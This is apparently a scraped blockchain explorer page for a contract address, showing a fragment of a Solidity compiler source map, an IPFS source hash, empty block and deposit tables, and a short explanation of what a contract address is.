194;;;;:::o;18706:180::-;18754:77;18751:1;18744:88;18851:4;18848:1;18841:15;18875:4;18872:1;18865:15;18892:185;18932:1;18949:20;18967:1;18949:20;:::i;:::-;18944:25;;18983:20;19001:1;18983:20;:::i;:::-;18978:25;;19022:1;19012:35;;19027:18;;:::i;:::-;19012:35;19069:1;19066;19062:9;19057:14;;18892:185;;;;:::o

Swarm Source

ipfs://65af20299027e12538603df13742f158ff41ec091e7524e62dd0d4752044d297

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.